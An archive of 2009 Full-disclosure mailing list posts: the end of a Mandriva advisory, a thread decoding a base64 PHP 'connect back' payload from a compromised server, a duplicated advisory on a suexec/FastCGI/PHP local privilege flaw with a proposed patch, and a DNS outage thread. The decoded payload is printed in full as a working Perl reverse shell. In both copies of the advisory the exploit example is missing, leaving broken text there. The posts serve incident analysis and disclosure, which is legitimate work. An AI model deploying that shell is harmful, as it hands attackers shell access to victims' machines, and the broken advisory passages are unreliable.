7d4158cbead8c2f257327fa947183889 2009.0/i586/gstreamer0.10-esound-0.10.10-2.1mdv2009.0.i586.rpm c12d76e19388a0bc96723252a6882a45 2009.0/i586/gstreamer0.10-flac-0.10.10-2.1mdv2009.0.i586.rpm 5bd137ba566a3fbe0f7a58a293046923 2009.0/i586/gstreamer0.10-plugins-good-0.10.10-2.1mdv2009.0.i586.rpm 2d8ffce05f943cde7237117e51816dc9 2009.0/i586/gstreamer0.10-pulse-0.10.10-2.1mdv2009.0.i586.rpm 5546602310d369d1d9b784e9a4f47577 2009.0/i586/gstreamer0.10-raw1394-0.10.10-2.1mdv2009.0.i586.rpm fc4922a6c70a5c611647c5ec2f1ae9e7 2009.0/i586/gstreamer0.10-soup-0.10.10-2.1mdv2009.0.i586.rpm d42916979b54613c3be7591ade5da727 2009.0/i586/gstreamer0.10-speex-0.10.10-2.1mdv2009.0.i586.rpm c2581f15e3439fe5dbd7096541ad46e8 2009.0/i586/gstreamer0.10-wavpack-0.10.10-2.1mdv2009.0.i586.rpm 08723d4a2eaa0f5d564a34ae120d8390 2009.0/SRPMS/gstreamer0.10-plugins-good-0.10.10-2.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 618b0f23135de1db4cc3a55f6c32973c 2009.0/x86_64/gstreamer0.10-aalib-0.10.10-2.1mdv2009.0.x86_64.rpm 4fe0b93bb062c565b1bc1eb63d5d5642 2009.0/x86_64/gstreamer0.10-caca-0.10.10-2.1mdv2009.0.x86_64.rpm 3b2b4a8704411fad70e9156dbad3ed4a 2009.0/x86_64/gstreamer0.10-dv-0.10.10-2.1mdv2009.0.x86_64.rpm 860a46cac6e60a0d9a543c8e89f46584 2009.0/x86_64/gstreamer0.10-esound-0.10.10-2.1mdv2009.0.x86_64.rpm 52bd426b3821c4d844999f5e3bfa77d9 2009.0/x86_64/gstreamer0.10-flac-0.10.10-2.1mdv2009.0.x86_64.rpm 0f52a696ac6afdf0d8265872d1748a2a 2009.0/x86_64/gstreamer0.10-plugins-good-0.10.10-2.1mdv2009.0.x86_64.rpm 5fb651ebf99b93fb346f734e9ca5cbfe 2009.0/x86_64/gstreamer0.10-pulse-0.10.10-2.1mdv2009.0.x86_64.rpm 5f7e0823e61559dd0037a14328b13925 2009.0/x86_64/gstreamer0.10-raw1394-0.10.10-2.1mdv2009.0.x86_64.rpm ee78e14a1831e667338b486de297b4b1 2009.0/x86_64/gstreamer0.10-soup-0.10.10-2.1mdv2009.0.x86_64.rpm 1678a544c7651cd119d2746e9c3949a1 2009.0/x86_64/gstreamer0.10-speex-0.10.10-2.1mdv2009.0.x86_64.rpm 31ec957603b4a0deb044ec2f7c427cb0 2009.0/x86_64/gstreamer0.10-wavpack-0.10.10-2.1mdv2009.0.x86_64.rpm 08723d4a2eaa0f5d564a34ae120d8390 2009.0/SRPMS/gstreamer0.10-plugins-good-0.10.10-2.1mdv2009.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJkiTqmqjQ0CJFipgRAgeoAKC1/4cDJT4jWm2bK3kdszfNjmGpmQCePJB4 49QMXQEqfHKT5vJgPag1/5s= =ITtm -----END PGP SIGNATURE----- From krakowlabs at gmail.com Wed Feb 11 05:17:32 2009 From: krakowlabs at gmail.com (Krakow Labs) Date: Wed, 11 Feb 2009 00:17:32 -0500 Subject: [Full-disclosure] Fuzzing for Fun and Profit Message-ID: <49925F6C.6020908@gmail.com> New fuzzing paper titled "Fuzzing for Fun and Profit". Text Available @ www.krakowlabs.com From aepereyra at gmail.com Wed Feb 11 02:37:45 2009 From: aepereyra at gmail.com (Augusto Pereyra) Date: Tue, 10 Feb 2009 23:37:45 -0300 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <3118e6cd0902101837l757456c9m8a362f5d28ffe090@mail.gmail.com> This is encoded in base64 If you decode it i will see the next program #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); If you want do it your self visit http://www.motobit.com/util/base64-decoder-encoder.asp paste the base64 code and you will see the light. Cool!!!! Best regard Augusto Pereyra ? On Tue, Feb 10, 2009 at 3:23 PM, sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > > From jrogosky at gmail.com Wed Feb 11 03:01:34 2009 From: jrogosky at gmail.com (Justin Rogosky) Date: Tue, 10 Feb 2009 22:01:34 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101134m4c42b9f1lfc59617054b830b7@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <5d80962a0902101134m4c42b9f1lfc59617054b830b7@mail.gmail.com> Message-ID: <1234321294.20361.2.camel@Chrome> Just as an FYI: Webscarab and Paros (web application proxies) both have a good Base64 decoder built-in. This is useful for any sniffed requested using basic authentication as well. --Justin On Tue, 2009-02-10 at 14:34 -0500, sr. wrote: > i really appreciate all of the responses. this is what community is all about. > > i'd seen the "==" in other encoding schemes, but just wasn't sure and > wanted a quick response...thanks to everyone who responded! > > I'll post the rest of my findings on here asap. i'm looking into an > old compromised machine. this is nothing new.. > > whoever mentioned the r57 shell, you're probably right as the script > connects to a remote box @ port 11457. this is r57 behaviour. > > i also found a copy of the same script i'm dissecting on someone > else's box, you can check it out here: > http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php > > in my case, a bunch of php files were modified. i'll zip everything up > and host it so you can all analyze... > > thx, > > sr. aka "fabrizio siciliano" > > > > > > On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro wrote: > > "Sr." > > > > This is base64 encoded. > > > > 2009/2/10 sr. : > >> can anyone tell me what encoding this is? > >> > >> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > >> > >> this has to do with old php 4.x.x version with magic quotes enabled. > >> i'm just trying to figure out what the connect back code does. > >> > >> any input is much appreciated. > >> > >> thx, > >> > >> sr. > > > > -- > > Saludos, > > Gustavo Castro Puig. > > E-Mail: gcastrop at gmail.com > > > > LPI Level-1 Certified (https://www.lpi.org/es/verify.html > > LPID:LPI000042304 Verification Code: hp6re8w5qg ) > > -----BEGIN GEEK CODE BLOCK----- > > Version: 3.12 > > GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o? > > K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++ > > D++ G++ e++ h--- r y+++ > > ------END GEEK CODE BLOCK------ > > Registered Linux User #69342 > > > > From andrew at amxl.com Wed Feb 11 09:56:42 2009 From: andrew at amxl.com (Andrew Miller) Date: Wed, 11 Feb 2009 22:56:42 +1300 Subject: [Full-disclosure] Local vulnerability in suexec + FastCGI + PHP configurations Message-ID: <4992A0DA.6080905@amxl.com> DISCLAIMER: THIS SECURITY ADVISORY IS PROVIDED AS-IS, AND WITHOUT ANY GUARANTEE OF ANY KIND THAT THE INFORMATION IS ACCURATE, OR THAT THE WORKAROUND, SOLUTIONS, OR PATCHES PROVIDED WILL PROTECT SYSTEMS, OR THAT THEY WILL NOT CREATE NEW PROBLEMS. THE AUTHOR ACCEPTS NO LIABILITY OF ANY FORM FOR THE INFORMATION CONTAINED WITHIN OR THE CONSEQUENCES OF ITS USE OR MISUSE. Synopsis: Most current installations of PHP set up to run via FastCGI with suexec are vulnerable to a local exploit, where anyone with the ability to run code as the user the webserver runs as can gain access as any user with an account set up to run PHP. It is anticipated that this issue will especially affect shared web hosts who use FastCGI + suexec thinking it will give them additional security. Conditions for exploitation: => PHP needs to be used via CGI or FastCGI. => The system must be set up to use suexec (rather than, say, having PHP run as an external FastCGI server). => The attacker must be able to run code as the same user that the webserver runs as. This is unlikely to be a problem for many local attackers, because there are a multitude of possible attack vectors, such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also installed), and likely numerous other options. => Depending on the configuration, setting an open_basedir might protect an installation. However, this only applies if open_basedir is set, php-cgi is not installed directly into the web space, but is instead called from a script which doesn't pass any parameters from the script command line. Affected PHP versions: => All versions of PHP (including PHP 5.2.8 and latest CVS) in existence at the date of this advisory are believed to be affected. Vendor notification: security at php.net has been informed of this issue. Antony Dovegal replied to say: "It's been agreed that we won't implement any more security hacks in PHP itself since such things should be done by the OS, so no more magic INI settings." As such, it appears that the PHP developers do not intend to add any technical measures against this vulnerability. It should be noted that while this is a vulnerability in a way of installing PHP, it appears that there is no way to securely set up a suexec + FastCGI + PHP installation using an unpatched version of PHP and so it is hoped that the PHP developers will reconsider in time. Work-arounds: A proposed patch is provided later which can be applied to PHP to protect against this vulnerability (when coupled with an appropriate configuration). This patch has been briefly tested to ensure it works, but requires more testing and review before it should be used in production. No guarantees are made about it. Using a permanently running external FastCGI process per user is an alternative solution if the cost of these extra processes is tolerable. Setting open_basedir from within php.ini may be a possible workaround (but only if nowhere in open_basedir is writable to the attacker), but only if PHP is called from a script which also sets SERVER_SOFTWARE and doesn't pass through the command line arguments. For example: #!/bin/bash export SERVER_SOFTWARE=blah /usr/bin/php-cgi -c /home/myuser/php.ini Technical details of attack: PHP does not place any restrictions on what it will run, even when called from suexec. This means that by manipulating the environment variables passed in to php-cgi when calling via suexec, an attacker can execute arbitrary PHP scripts with the user of the owner of the PHP script (and if SERVER_SOFTWARE is not set, can also pass in PHP code to be executed via stdin). The filtering of environment variables by suexec does not protect against this attack, because the environment variables needed to perform the attack are passed through suexec. Likewise, setting doc_root and user_dir in php.ini (as recommended in the security section of the PHP manual) provides no protection, as the attacker has full control of environments indicating the base directory. Example of exploitation: Suppose that suexec php is set up as follows: In /home/wwjargon/public_html/php.fcgi we have: #!/bin/bash /usr/bin/php-cgi -c /home/wwjargon/php.ini In .htaccess we have: Action php-fcgi /php.fcgi AddHandler php-fcgi .php This is a fairly common set up. It can be exploited as follows (www-data is the username the webserver runs as): $ whoami www-data $ cat >/tmp/exploit.php #include "win32/php_registry.h" #endif +#ifdef HAVE_PWD_H +#include +#endif #ifdef __riscos__ #include @@ -170,6 +173,10 @@ zend_bool impersonate; # endif #endif +#ifdef HAVE_PWD_H + char* suexec_base_dir; + char* suexec_user_dir; +#endif } php_cgi_globals_struct; #ifdef ZTS @@ -1232,6 +1239,10 @@ STD_PHP_INI_ENTRY("fastcgi.impersonate", "0", PHP_INI_SYSTEM, OnUpdateBool, impersonate, php_cgi_globals_struct, php_cgi_globals) # endif #endif +#ifdef HAVE_PWD_H + STD_PHP_INI_ENTRY("cgi.suexec_base_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_base_dir, php_cgi_globals_struct, php_cgi_globals) + STD_PHP_INI_ENTRY("cgi.suexec_user_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_user_dir, php_cgi_globals_struct, php_cgi_globals) +#endif PHP_INI_END() /* {{{ php_cgi_globals_ctor @@ -1254,6 +1265,10 @@ php_cgi_globals->impersonate = 0; # endif #endif +#ifdef HAVE_PWD_H + php_cgi_globals->suexec_base_dir = NULL; + php_cgi_globals->suexec_user_dir = NULL; +#endif } /* }}} */ @@ -1708,6 +1723,10 @@ #if PHP_FASTCGI && !fastcgi #endif +#ifdef HAVE_PWD_H + && CGIG(suexec_base_dir) == NULL + && CGIG(suexec_user_dir) == NULL +#endif ) { while ((c = php_getopt(argc, argv, OPTIONS, &php_optarg, &php_optind, 0)) != -1) { switch (c) { @@ -1884,6 +1903,10 @@ #if PHP_FASTCGI || fastcgi #endif +#ifdef HAVE_PWD_H + || CGIG(suexec_base_dir) != NULL + || CGIG(suexec_user_dir) != NULL +#endif ) { file_handle.type = ZEND_HANDLE_FILENAME; @@ -1922,9 +1945,49 @@ */ retval = FAILURE; if (cgi || SG(request_info).path_translated) { +#ifdef HAVE_PWD_H + zend_bool path_ok = !(CGIG(suexec_base_dir) || + CGIG(suexec_user_dir)); + if (!path_ok && SG(request_info).path_translated) + { + struct stat statbuf; + char *real_path = tsrm_realpath(SG(request_info).path_translated, NULL TSRMLS_CC); + + virtual_stat(SG(request_info).path_translated, &statbuf TSRMLS_CC); + /* Only execute if the script is owned by the current user, + * the user execute bit is set, and it is not group or world + * writable. + */ + if (statbuf.st_uid == geteuid() && + (statbuf.st_mode & 0100) == 0100 && + (statbuf.st_mode & 022) == 0) { + if (CGIG(suexec_base_dir) && !strncmp(real_path, CGIG(suexec_base_dir), strlen(CGIG(suexec_base_dir)))) { + path_ok = 1; + } + if (!path_ok && CGIG(suexec_user_dir)) { + struct passwd* pw = getpwuid(geteuid()); + size_t len = strlen(pw->pw_dir) + 1 + strlen(CGIG(suexec_user_dir)) + 2; + char * user_dir = malloc(len); + strcpy(user_dir, pw->pw_dir); + strlcat(user_dir, "/", len); + strlcat(user_dir, CGIG(suexec_user_dir), len); + strlcat(user_dir, "/", len); + if (!strncmp(real_path, user_dir, len - 1)) + path_ok = 1; + free(user_dir); + } + free(real_path); + } + } + + if (path_ok) { +#endif if (!php_check_open_basedir(SG(request_info).path_translated TSRMLS_CC)) { retval = php_fopen_primary_script(&file_handle TSRMLS_CC); } +#ifdef HAVE_PWD_H + } +#endif } /* if we are unable to open path_translated and we are not Usage of the patch: => Apply to PHP 5.2.8 and rebuild and install php-cgi. => Replace the scripts in the web directory with a script like: #!/bin/bash /usr/bin/php-cgi -c /etc/php.ini Then in php.ini, you have two new configuration options: cgi.suexec_base_dir cgi.suexec_user_dir If either of these directives are set, extra security checks are enabled. If both are set, the security checks for one or the other of the directives must pass. cgi.suexec_base_dir restricts script execution to paths starting with the directive (include a trailing slash if you don't want it to be used as a prefix). cgi.suexec_user_dir gives a path relative to the users home directory where PHP will execute code from. In addition, any PHP scripts to be executed must be owned by the same user, have the execute bit set, and not be group or world writable. From sec.432 at amxl.com Wed Feb 11 10:22:51 2009 From: sec.432 at amxl.com (Andrew Miller) Date: Wed, 11 Feb 2009 23:22:51 +1300 Subject: [Full-disclosure] Local vulnerability in suexec + FastCGI + PHP configurations Message-ID: <4992A6FB.3020202@amxl.com> DISCLAIMER: THIS SECURITY ADVISORY IS PROVIDED AS-IS, AND WITHOUT ANY GUARANTEE OF ANY KIND THAT THE INFORMATION IS ACCURATE, OR THAT THE WORKAROUND, SOLUTIONS, OR PATCHES PROVIDED WILL PROTECT SYSTEMS, OR THAT THEY WILL NOT CREATE NEW PROBLEMS. THE AUTHOR ACCEPTS NO LIABILITY OF ANY FORM FOR THE INFORMATION CONTAINED WITHIN OR THE CONSEQUENCES OF ITS USE OR MISUSE. Synopsis: Most current installations of PHP set up to run via FastCGI with suexec are vulnerable to a local exploit, where anyone with the ability to run code as the user the webserver runs as can gain access as any user with an account set up to run PHP. It is anticipated that this issue will especially affect shared web hosts who use FastCGI + suexec thinking it will give them additional security. Conditions for exploitation: => PHP needs to be used via CGI or FastCGI. => The system must be set up to use suexec (rather than, say, having PHP run as an external FastCGI server). => The attacker must be able to run code as the same user that the webserver runs as. This is unlikely to be a problem for many local attackers, because there are a multitude of possible attack vectors, such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also installed), and likely numerous other options. => Depending on the configuration, setting an open_basedir might protect an installation. However, this only applies if open_basedir is set, php-cgi is not installed directly into the web space, but is instead called from a script which doesn't pass any parameters from the script command line. Affected PHP versions: => All versions of PHP (including PHP 5.2.8 and latest CVS) in existence at the date of this advisory are believed to be affected. Vendor notification: security at php.net has been informed of this issue. Antony Dovegal replied to say: "It's been agreed that we won't implement any more security hacks in PHP itself since such things should be done by the OS, so no more magic INI settings." As such, it appears that the PHP developers do not intend to add any technical measures against this vulnerability. It should be noted that while this is a vulnerability in a way of installing PHP, it appears that there is no way to securely set up a suexec + FastCGI + PHP installation using an unpatched version of PHP and so it is hoped that the PHP developers will reconsider in time. Work-arounds: A proposed patch is provided later which can be applied to PHP to protect against this vulnerability (when coupled with an appropriate configuration). This patch has been briefly tested to ensure it works, but requires more testing and review before it should be used in production. No guarantees are made about it. Using a permanently running external FastCGI process per user is an alternative solution if the cost of these extra processes is tolerable. Setting open_basedir from within php.ini may be a possible workaround (but only if nowhere in open_basedir is writable to the attacker), but only if PHP is called from a script which also sets SERVER_SOFTWARE and doesn't pass through the command line arguments. For example: #!/bin/bash export SERVER_SOFTWARE=blah /usr/bin/php-cgi -c /home/myuser/php.ini Technical details of attack: PHP does not place any restrictions on what it will run, even when called from suexec. This means that by manipulating the environment variables passed in to php-cgi when calling via suexec, an attacker can execute arbitrary PHP scripts with the user of the owner of the PHP script (and if SERVER_SOFTWARE is not set, can also pass in PHP code to be executed via stdin). The filtering of environment variables by suexec does not protect against this attack, because the environment variables needed to perform the attack are passed through suexec. Likewise, setting doc_root and user_dir in php.ini (as recommended in the security section of the PHP manual) provides no protection, as the attacker has full control of environments indicating the base directory. Example of exploitation: Suppose that suexec php is set up as follows: In /home/wwjargon/public_html/php.fcgi we have: #!/bin/bash /usr/bin/php-cgi -c /home/wwjargon/php.ini In .htaccess we have: Action php-fcgi /php.fcgi AddHandler php-fcgi .php This is a fairly common set up. It can be exploited as follows (www-data is the username the webserver runs as): $ whoami www-data $ cat >/tmp/exploit.php #include "win32/php_registry.h" #endif +#ifdef HAVE_PWD_H +#include +#endif #ifdef __riscos__ #include @@ -170,6 +173,10 @@ zend_bool impersonate; # endif #endif +#ifdef HAVE_PWD_H + char* suexec_base_dir; + char* suexec_user_dir; +#endif } php_cgi_globals_struct; #ifdef ZTS @@ -1232,6 +1239,10 @@ STD_PHP_INI_ENTRY("fastcgi.impersonate", "0", PHP_INI_SYSTEM, OnUpdateBool, impersonate, php_cgi_globals_struct, php_cgi_globals) # endif #endif +#ifdef HAVE_PWD_H + STD_PHP_INI_ENTRY("cgi.suexec_base_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_base_dir, php_cgi_globals_struct, php_cgi_globals) + STD_PHP_INI_ENTRY("cgi.suexec_user_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_user_dir, php_cgi_globals_struct, php_cgi_globals) +#endif PHP_INI_END() /* {{{ php_cgi_globals_ctor @@ -1254,6 +1265,10 @@ php_cgi_globals->impersonate = 0; # endif #endif +#ifdef HAVE_PWD_H + php_cgi_globals->suexec_base_dir = NULL; + php_cgi_globals->suexec_user_dir = NULL; +#endif } /* }}} */ @@ -1708,6 +1723,10 @@ #if PHP_FASTCGI && !fastcgi #endif +#ifdef HAVE_PWD_H + && CGIG(suexec_base_dir) == NULL + && CGIG(suexec_user_dir) == NULL +#endif ) { while ((c = php_getopt(argc, argv, OPTIONS, &php_optarg, &php_optind, 0)) != -1) { switch (c) { @@ -1884,6 +1903,10 @@ #if PHP_FASTCGI || fastcgi #endif +#ifdef HAVE_PWD_H + || CGIG(suexec_base_dir) != NULL + || CGIG(suexec_user_dir) != NULL +#endif ) { file_handle.type = ZEND_HANDLE_FILENAME; @@ -1922,9 +1945,49 @@ */ retval = FAILURE; if (cgi || SG(request_info).path_translated) { +#ifdef HAVE_PWD_H + zend_bool path_ok = !(CGIG(suexec_base_dir) || + CGIG(suexec_user_dir)); + if (!path_ok && SG(request_info).path_translated) + { + struct stat statbuf; + char *real_path = tsrm_realpath(SG(request_info).path_translated, NULL TSRMLS_CC); + + virtual_stat(SG(request_info).path_translated, &statbuf TSRMLS_CC); + /* Only execute if the script is owned by the current user, + * the user execute bit is set, and it is not group or world + * writable. + */ + if (statbuf.st_uid == geteuid() && + (statbuf.st_mode & 0100) == 0100 && + (statbuf.st_mode & 022) == 0) { + if (CGIG(suexec_base_dir) && !strncmp(real_path, CGIG(suexec_base_dir), strlen(CGIG(suexec_base_dir)))) { + path_ok = 1; + } + if (!path_ok && CGIG(suexec_user_dir)) { + struct passwd* pw = getpwuid(geteuid()); + size_t len = strlen(pw->pw_dir) + 1 + strlen(CGIG(suexec_user_dir)) + 2; + char * user_dir = malloc(len); + strcpy(user_dir, pw->pw_dir); + strlcat(user_dir, "/", len); + strlcat(user_dir, CGIG(suexec_user_dir), len); + strlcat(user_dir, "/", len); + if (!strncmp(real_path, user_dir, len - 1)) + path_ok = 1; + free(user_dir); + } + free(real_path); + } + } + + if (path_ok) { +#endif if (!php_check_open_basedir(SG(request_info).path_translated TSRMLS_CC)) { retval = php_fopen_primary_script(&file_handle TSRMLS_CC); } +#ifdef HAVE_PWD_H + } +#endif } /* if we are unable to open path_translated and we are not Usage of the patch: => Apply to PHP 5.2.8 and rebuild and install php-cgi. => Replace the scripts in the web directory with a script like: #!/bin/bash /usr/bin/php-cgi -c /etc/php.ini Then in php.ini, you have two new configuration options: cgi.suexec_base_dir cgi.suexec_user_dir If either of these directives are set, extra security checks are enabled. If both are set, the security checks for one or the other of the directives must pass. cgi.suexec_base_dir restricts script execution to paths starting with the directive (include a trailing slash if you don't want it to be used as a prefix). cgi.suexec_user_dir gives a path relative to the users home directory where PHP will execute code from. In addition, any PHP scripts to be executed must be owned by the same user, have the execute bit set, and not be group or world writable. From staticrez at gmail.com Wed Feb 11 15:00:31 2009 From: staticrez at gmail.com (sr.) Date: Wed, 11 Feb 2009 10:00:31 -0500 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 In-Reply-To: References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>

Message-ID: <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> .org is now being affected as well. On Wed, Feb 11, 2009 at 3:11 AM, alessandro telami wrote: > I'm seeing the same on my Network. > > Cyber-threats > > ________________________________ > Date: Tue, 10 Feb 2009 16:08:38 -0600 > From: vigilantgregorius at gmail.com > To: staticrez at gmail.com > CC: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] metasploit.com = 127.0.0.1 > > DDOS > > > On Tue, Feb 10, 2009 at 4:05 PM, sr. wrote: > > anybody else seeing this? > > can't get to metasploit because it's currently resolving to 127.0.0.1 > > sr. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > ________________________________ > Share your photos with Windows Live Photos - Free Try it Now! From michael.holstein at csuohio.edu Wed Feb 11 15:17:42 2009 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Wed, 11 Feb 2009 10:17:42 -0500 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 In-Reply-To: <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>

<5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> Message-ID: <4992EC16.5090802@csuohio.edu> > .org is now being affected as well. > Not here .. $ date Wed Feb 11 10:17:01 EST 2009 $ host metasploit.org metasploit.org has address 66.240.213.84 metasploit.org mail is handled by 20 slug.metasploit.com. metasploit.org mail is handled by 1 bogus.metasploit.com. metasploit.org mail is handled by 30 core.metasploit.com. $ host metasploit.com metasploit.com has address 66.240.213.81 metasploit.com mail is handled by 30 core.metasploit.com. metasploit.com mail is handled by 20 slug.metasploit.com. metasploit.com mail is handled by 1 bogus.metasploit.com. From Dirk.Reimers at gmx.de Wed Feb 11 15:21:28 2009 From: Dirk.Reimers at gmx.de (Dirk Reimers) Date: Wed, 11 Feb 2009 16:21:28 +0100 Subject: [Full-disclosure] (no subject) Message-ID: <20090211152128.215040@gmx.net> <> .org is now being affected as well. <> < References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>

<5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu> Message-ID: <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com> that's all fine and dandy. still can't reach port 80. On Wed, Feb 11, 2009 at 10:17 AM, Michael Holstein wrote: > >> .org is now being affected as well. >> > > Not here .. > > $ date > Wed Feb 11 10:17:01 EST 2009 > > $ host metasploit.org > metasploit.org has address 66.240.213.84 > metasploit.org mail is handled by 20 slug.metasploit.com. > metasploit.org mail is handled by 1 bogus.metasploit.com. > metasploit.org mail is handled by 30 core.metasploit.com. > > $ host metasploit.com > metasploit.com has address 66.240.213.81 > metasploit.com mail is handled by 30 core.metasploit.com. > metasploit.com mail is handled by 20 slug.metasploit.com. > metasploit.com mail is handled by 1 bogus.metasploit.com. > From michael.holstein at csuohio.edu Wed Feb 11 15:54:10 2009 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Wed, 11 Feb 2009 10:54:10 -0500 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 In-Reply-To: <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com> References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>

<5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu> <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com> Message-ID: <4992F4A2.5020201@csuohio.edu> > that's all fine and dandy. still can't reach port 80. > Again .. not here (AS32818 in Cleveland, OH) .. ~$ wget -O - http://www.metasploit.org --10:52:43-- http://www.metasploit.org/ => `-' Resolving www.metasploit.org... 66.240.213.84 Connecting to www.metasploit.org|66.240.213.84|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 8,157 (8.0K) [text/html] 0% [ ] 0 --.--K/s The Metasploit Project ... From michael.holstein at csuohio.edu Wed Feb 11 16:00:40 2009 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Wed, 11 Feb 2009 11:00:40 -0500 Subject: [Full-disclosure] metasploit.com = 127.0.0.1 In-Reply-To: <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com> References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>

